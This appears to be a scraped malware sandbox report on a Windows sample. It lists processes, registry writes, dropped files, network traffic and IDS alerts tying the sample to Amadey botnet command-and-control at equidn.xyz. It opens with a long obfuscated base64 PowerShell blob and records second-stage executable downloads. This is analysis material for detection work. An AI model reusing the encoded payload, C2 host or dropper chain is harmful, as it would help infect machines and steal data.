BVAF0AbQBMAG0AaABCAHsATAB4AFkAegBeAHEAXQBhAEMAbgAtAGMAIAB7AEkAMwB7AEAAPABZAEAAVABtAHcATwBQAEYAQwB7AEMAUAAsAC4AXgBAAD0AXgAkADAAUgBEACkAYwAlACwAbgB1AFcAZQBlAHIAIwBKAHkAOwBfADYAcgBIADgAcAAtACwASABuAGwAKgAlAFEAWABWAFsAUwArACAAdwB5ACEAeAB8AHEAUABuAHEAYgBSAEwAdAApAHQARgBCAFQAXwBZAHIAPQBEAE0ATAAhAG4AcwBuAD4AWQANAAoAIAAgACAAIAAgACMAIABBAGgAbwA0AFoAewA4AG8ALQBbAD8AUwBOAGYAWAApAFYANQA5AFoAaQBtAEsANgAmAHEAWwBtAEwAPQByAGUARwBXAFsAOQBJAGYAJABAAEYAPgA5AFsAMgB7AHcAVQBMAEgAOgAhAD0AbAAuAHYAWQA4ADQALQB5ADYAQAArACoAeQB0AFIAdwB7AGMARwBLACwATABxADoAbQBFAFsATABDAFMAbwBGADYAWQA+AF0AZQAmAE8AIQBOAFEAPwAuADoAWgBZADQANgAuAF4ALQBlAFkALQBGADgAagA7AEkAcQArAF0AJAA3AF8AMgAoAH0ATgBiACMAcAArADYAWAAsAHYAJABWACQAUAA4AEgARQA1AEgAKwBTADUAMQBrACMAVgB8AHcAcgBzAFsAewBFAGMARABlACkAKgBIADIANQA1AD8AWwA3ACMAIwBmAC4AOwBqAGgATwAxAGQAUgBFAFAAVABxAGQANQBlAEcAKQAoAHAAfQBxAEwAQwBIAHoALgBoAD4AVwBlAEsAewBsAFoAJAAjAFYATQA1AEsAQABQAG4APQBPAHUAQABGAE4AOAB2ADsAQABYADMAJgAkAGMAXQBaADYASQBNAHoAIABQADYAYgBpADYASwBOADgAMgBnAGsAdwA7AFsAfQBOADoAKQAuAHIAMwA0AGYAUQBqAFQAVABuAD8APQB4AFoASQAwAEIAVgBmAEMAYQA4AEYAfABEACQAMQBSAFkAXwB6AFYAKwB8AHgAJAA3AF0AZABvAGEAcwAxAFIAJQBkAEkASQBSAGQAewA+AFoAPQBvAGIAcQBHAFUAQQBWADcAdAB4AEMANQBAAD8AMwBaAEsAZwAyAFUAZgBjAHEAUwB4ACsAbABGADwAbQB7AD4AeABsACAAZgApAEEAQABfAD0AVwBlAH0AJQAjADAAIAB5AGYAIAAxAHwAVgBAAEQAewBFACMAJgBPACYAPgBAAGsAeQArAHQAUABzAHIAcABFADUAdAArAFcAeQA0AGoAQABVAC0AbAA+AEYAOgB9AGQAeQBzACkASAAuAGQAXQBWADAAVwAhAGcANABpAHYAbwArAFsAUwB7AD0AOAArACMAdwBWAHsAegBUAFQAYQBrAGMAMgBpAFAAXwBeAG8AXgBjAHQAUABsAHMATgBCAHEAMABnADIAMwAgAGsAegAgAFcATAAoADAAawBIAG4AJgAyADIALgAqACYAYQBUADMASQAjAF8AcgBWAHQAZAAmADgAaAB6AHYAUgB5ACQANQBeADMAKQAzAFoAawBPAHAAOABHAFAAbQBPAFoAcAAzAFAALQBwAGIAWwBiADEAWABHAFcAawAhAHoATQB2AHIAWgByACoATAA/ADEAcwBIAHoAQAAwAHkAVgBZAHwAaQBmAEYAewAtADQAewBlAF4AcQB5AEQAaAA+AEMAYgAkAGIAUgBMACYAPABLAHYARwBXACsARgBNAGgATgAoAEUAVwAuADwARgA1ACgAWAB9AGUASgBlACsAKAAmAG0AXwBFAFUAagA8ADQAbwB3ACEAKwBwAHsAKQBaAHwAbABRAEEAawBNAFEAewBRAEIAZAA9AGMAagBXAGQAeABDAGkATgBJAF0ANwBZAGUALgAjAC0AMQB7ADIAUQB8AEMAawBWAEkATgBuAGsAYwAzAFYAUgB1AGQAWgB8ACoAQABiADIAcQAwACkAegAzAGgAeQA/AGcAeQBtADIAdQAmADAAJQBjAD0AfAAzAHoAXQBmAF4APgAtAFsAPAB7AE8AZABJAHsAMABLADEALgBHAD8AaAAjACoAeAA+AFkAPABuAEcAUgBrAEkAUQBDAFsAegA6AHcAYQBXAEQAeAB1AFEAagBsAFsAIABJAFgASQBeACUAOQBOAHUAPAAgAEAAIQBzAG4AawArAHwAWAAmADAAQQBuADUAUQB3AFQAQABfAG4ARABpAFQALABzAGkAdQAlACMAVwBGAF8ARwBxAFAAbQApAD4ANABlAHgAPQAlACUAMQBJAFYAUQBNACgAfABFAHIAWwBpACUAdABpAE0AQwBtAGkAawBOAGMAXQA1ADoARwA9AEYAXQB3ADIAbwBVAE0AdwB9AGMARwBhAF4AWgBMAF0AJABMADIATgB8AGQAfAB8AC0AMQBlACUAPwBMAE8AXwAxAGgADQAKACAAIAAgACAAIAAgACAAIwAgAEMAVABZAE8APQB6AFkAcQA6AD8ASgB2AFAAdAA2AHsAaQB5AGIAfABpAGwAcAB7AGsAcABWAGoAcQA7AGoARAA4AHEAIwAyAE0APwAzAEAATABaAEQARwBsADoAPwBlAGwAUQBTAHYAYwBSACkAfABmAGMAawBmAFkAOwAyAHIAMAAsAFgATQBoAGQAMQAuAFEASQBCAGsAKABdAFsAPwBCACUAOgBNAE0AQwBwAFYARQA5AE4ALgBvAEcAMABJAF8AbwB2AHEARgB1AHIAKQBQACkAJQBhAEAAWgBNADgAdwBsAHUAWABDAEAAUgAyAEUAfABFAFAAMgBdACoANQBqAHEAMQBVAEYAWgAkAEIAWQBNAEQAUgApAG0AQgB0ACwAZAB3ACgAPQByAD4AYQA0AHwAaABiAGwAZQBTADQASAAoAFgARABpAEsAcgB4ADEALAA9AEIAPwBVAFoARQBaAEIAbAA3AE0APwAmAF4AOgAtAFsALAA7ACYAaABDAHwAYwBmAE0AcAAqAD8AYwBIAFYAQwA8AEUAPABxAEkAOABiAGUAMABBAE4AUABHAGsAYgB9AGoANwA8AE8AUwBdAEUAWwBJAD8AUwBQAEgAQgBRACgAUQA3ADEAfAA6AGsAZwA/AHIALQBlACwAMABDAC0AIQBeAE8ASgByAGEAQQBqACMAWQBVACgAaQAoAFoATgBjAGgALgB7ACQAIQB4ACwAOQBuAEcALAAgADEAcwAuADEAagAyAFsAVwBGAC4APgBPAD4ARAAmADYAKAA+AHwAJQBGAF8AfQArADoAMQAsACgAWgAxAGkAcQBNAHcAPgA2ADcAQgBPACgALQBLAF8AdQBbAHgAcgAzAEcATQBbAEAAKQBPAEQAMQB2AHsAcwAkAGkAJQB0AEQAQwBYAFUANAA4ADgAQQBIAF4AUQA5AGgAaQArAH0AOQB7ACoAMQBTADEAVAAtAFQAMABtAEIAUABMADcAJAA+AGsAMwBLAHEAZgBGAHkAbABzACsAQABoADIAUgBsAEAAIQBeAFgAVgBrADEAKgA0ADYAbAAxAF0AUQA8ADkAVQBRACsAaQBpAHwAdQBWAG0AKQBWAHUAQAA+AE4AbwA5AEEAWgAlADgAdABIACAAPgBNADwAWQBXADAAWwBxAE8AegBkAF0AIQA1AD8AKQBtAHcAOwBIAFEAbQB7AC0AdABdAEQASAAoACoAaQA/ADwAbAAlAGoAQABFAFQAOgA9ACsASgAhAEwASwAyAG4AdQBFAHQAZQBLADAAawA0AFAAWQBoAGcAYgBJAHoAdgBBADgAYgBCAHwAaABCAEMAMQBeAFgAZQAwADAARQB2ACgAPwBmACUAPQBzADsAQwBOADoAPABsAEsAYQB2AGwAJgBmAH0AZQAtAEQAUgAkACwAWABCADgAZgAsACoAcABVAGcANQB8AHMAbwBUAFYASAB1ACAAWgA5AGkAXgByAEgASAB5AHoAfQBeAF4ASwBJAHoAMQBAACkAeQBsAHwAeAArADgAXQB6AHAAYgBKACYAbgB8AFEASQAkAFsAQgA+ADcAQABQACoAOwB9AGoAQgBDACwAPABiAHwAMwB4AGIARgByACAAQQA1AEgAagBoAHwAMABsAF8AXwBnAHMANQBjAFYARgB7ADYAIwAsAFAAQwArAHsAKgA2ADAATgAqACsAUQBuAHIAbABBAFYAZwBtAEkAYgB8AHQANABOAGoAfABAAE4AeAA3ADoAcwBUADcAYwBuADUAKgBeAFMAYQA4ADgAXwBGADAASgBzAFQAbABNAHYAMQAjAC0AMgA7AEkAfQBPADcAZQBAADgAIQBWAHMAPgBZAEAAYwA7AFYAOgA6AFIAcQByAD0ALQBEADkAZgBBADUAXgA9AHsAbAArADsAPAB8AEgAaAA/AFkAJgAkAHoAaABwADsAWgA+ACoASgArAFIAMwBlAEkALABiAF4AWgB7ADcAPgBMADQAcwA5AFoAWwBVAD0AdABjAG8AKQBzAEgAQwBzAHcAWAB2AC0AOABeAFIASgBAACAATwBiACUAVwBiAF8AYQBnAFgAQgA/AFMAKAAjAGkARQBqACAAbwBOACkAZgBWAFgAdABzAF0AMAANAAoAIAAgACMAIAAsAH0AfAB7ADcAPwA9AHsAUwAwADkAdABGAE0AXgBhAFIAQABKAG8AWwA4AEgATQAxAH0AJgA5AGwAcABCAF8AMgB3AFcAZQBdAEUAYQBuAGoAbABtACkAPABhAEMALABdAE4ANQBlAEgAfQBYAHgASgBjAFIATQBWAHwAOABdAHUAegBOACkAfAA6ACwAPgBDAGYAdgBAAC4AUwAkAEYANgBOADgAQQAoAGQAVwB7ACwAeAAwAG8AWAAyADwAbABQAEcAKQBMAHAAUgBGAHMALgAxAF8AOQBQADsAQwBnAEIAbwBRACoAOQBjADkAIQBHADAAbwB3AEcAWwBEAE0AdABAAHkAZAA9ACAAXgAkAFgAYgB3AEQAPwBNADUAZwBpAHAAdQBVAHcAdgA+AEoATAApAHcAJgAuACwAUQAkAD8AKwA7AG0AawBDAFEAIwAqAHsAbwBGAEcAegBZAEsASABuADQAOwBIAEcAYQBPAEYAQQA4AFIAWABwACkAbwBrAEIAcgBMAG0AfAAxADYAWwBWACMAVwB5ADQAeQBKAEwANwA3AGoAOwB4AF4AQQB2AHYATgAwAEgAaQBLAHIAdgBvACoAIABZAGUAZwBjAD0AfQBnAHEASwBzAGQAIwBUAD4ANwBZAEsAKABBACkAVwB4AFIAOQAlAGMAdwAjAGEASwBKAEMAUQB4ACYAUABpAEwAXgBEAC4AWQAtAEQAdAA/AH0ARQB7ACUAIABVAEUARABuAHsARQBwAF4AXQAmAG0AdgAhAFQAZgBBAEQAeQA0AFAAUwBqADwAMgBSAHQAZQArAH0AdQBdAEkAQwB8AGsAbABRAGkAagAqAHUAWABGAFkAMwA+AFUAcwAqAHAAUQBfAF0AIAAzAEsASQBVADwAOgBNADoATQBAAHoAWwBfAFIAawA+AFMAJQBfAFsARAB1AGsAUwBhACwAYgBaADQAeAAqADoAMAByADgATgByADgAIQAzAGoASgBmAE0AVQBUAEcAZgAhADgAfABYAHYAOwBIAHgAUAAxADEAMgB2AEwAcgBeAE4AWwB9ACoAIwB7ADQAKQBCAEUAIQBiAEAAQQBmAGQAOABaADsAQABNAGsAVAAqAFgAYQBAADMAfQA0ACoAUABUAEQAagBpAEUARgB6ACUASQBGAEMAfQB6AHIAIQAyAEgAVgA4AEMAWQAwACsANgBeAFoAXgBaADcAaABXADUARgBhACkALgApAHMAVQBvAFUAKABaAFcAPAA9AHkAcgBIACgAfQBqAFsAMABPACUAewBLACwAQQB6ADUANABVAG4AJgB9ADAAVAB6ACMAIAAkAFMANgBSAEgAXgBAADoAQwArAEYAcgBAAD8AegA0ACgALAB9ADUAagBVACUAcQBxACEAUwBoADIAMwA0AGMAVwA3ADwAZQBNAGQAYgBUAGYANgBfAHUAVgBmADUAPwBpAF8APQBVAD4ARABNAGoASwBSAGkAWQBEAG8AewAhAGUAUwBpAGgAZgBmAFQATABLADIAPgA2ADUALgAtAEkASQBqAF8ASwB1AEcAIwAuAEgATQBBAHYAUAA6AGkAdABTAD4ATgBNAD4AQgBqAG0ANgB2AHAAWQBJACUARwBzAHMAaQBHAH0AeAAsAHYALgBrAEYAUgAhADUAWQBPADkAbwBYAEsAZgA8AEoAMwB6AD0AYgAkAEAAZgA5AFcAagBfAEsAcwA2AFIAMQBrAFkASQAxAGQAdAAgAFMAUwA/AE8AQwBuAEoAKwBmAG8AOgBiAHMAXwA5ACUAYQBOAD4ATQBfAHoAIQBZAEQAeQByAD4ATQBEAHQAaQByAEoAWABLAC4AXgBVAEwAZgBVADwAdwBiAEcAQQBQAEgANAAgAGwAIAA4AHYAbQBRAHUAMQA+ADUAMwBrAH0AMwBnAE0AKgAwADcAKAA8AFYAfAAwAEsAVAB6AE8AVAA+AGYAYQBnAHYAVABvAF0AfQBdADIAZABLAGoAOABuAFEAcwBBAD0AKQBBACQAUgBdADoANgBsAGoAZQBNAHkAMwApAD8AdQB9ACEAXwBFAHUALgBeAHsATwBIAHwAJAAqAH0AbABdAD8AQQA7AA0ACgAgACAAIAAgACAAIAAgACUAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAkAF8ALgBSAGUAYQBEAFQATwBlAE4AZAAoACkAIAAgACAAIAB9ACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1268"C:\Users\admin\AppData\Local\Temp\10458330101\jzQILRF.exe" C:\Users\admin\AppData\Local\Temp\10458330101\jzQILRF.exe
ramez.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\10458330101\jzqilrf.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1332ping localhost -n 1 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\mswsock.dll
Total events
95 744
Read events
95 638
Write events
106
Delete events
0

Modification events

(PID) Process:(3572) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(3572) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(3572) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(3572) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(3572) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(1700) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(1700) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(1700) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(1700) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(1700) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
Executable files
51
Suspicious files
149
Text files
322
Unknown types
4

Dropped files

PID
Process
Filename
Type
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old~RF177dea.TMP
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF177dfa.TMP
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF177dfa.TMP
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF177dfa.TMP
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF177e09.TMP
MD5:
SHA256:
3572chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF177e09.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
201
TCP/UDP connections
225
DNS requests
193
Threats
44

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
POST
200
85.90.196.155:443
https://equidn.xyz/xapq
unknown
binary
32.7 Kb
GET
200
142.250.185.67:443
https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
unknown
image
1.62 Kb
whitelisted
1268
svchost.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6012
RUXIMICS.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6012
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
POST
200
40.126.31.67:443
https://login.live.com/RST2.srf
unknown
xml
1.24 Kb
whitelisted
GET
200
142.250.186.131:443
https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=133
unknown
compressed
59.2 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6012
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
85.90.196.155:443
equidn.xyz
UA
unknown
5944
MoUsoCoreWorker.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6012
RUXIMICS.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 216.58.206.78
whitelisted
equidn.xyz
  • 85.90.196.155
unknown
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.132
  • 20.190.160.2
  • 20.190.160.130
  • 40.126.32.133
  • 40.126.32.68
  • 20.190.160.128
  • 20.190.160.64
whitelisted
clientservices.googleapis.com
  • 142.250.186.99
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 172.217.16.202
  • 142.250.186.138
  • 142.250.186.106
  • 142.250.184.234
  • 142.250.186.170
  • 142.250.185.234
  • 142.250.185.170
  • 142.250.185.202
  • 142.250.186.42
  • 142.250.185.138
  • 142.250.185.106
  • 216.58.206.42
  • 216.58.212.170
  • 142.250.181.234
  • 142.250.186.74
  • 142.250.185.74
whitelisted
clients2.google.com
  • 172.217.18.14
whitelisted

Threats

PID
Process
Class
Message
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
Misc activity
ET INFO Packed Executable Download
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3832
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7860
ramez.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
7860
ramez.exe
Malware Command and Control Activity Detected
ET MALWARE Amadey CnC Response
7860
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7860
ramez.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7860
ramez.exe
Misc activity
ET INFO Packed Executable Download
Process
Message
4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
%s------------------------------------------------ --- Themida Professional --- --- (c)2012 Oreans Technologies --- ------------------------------------------------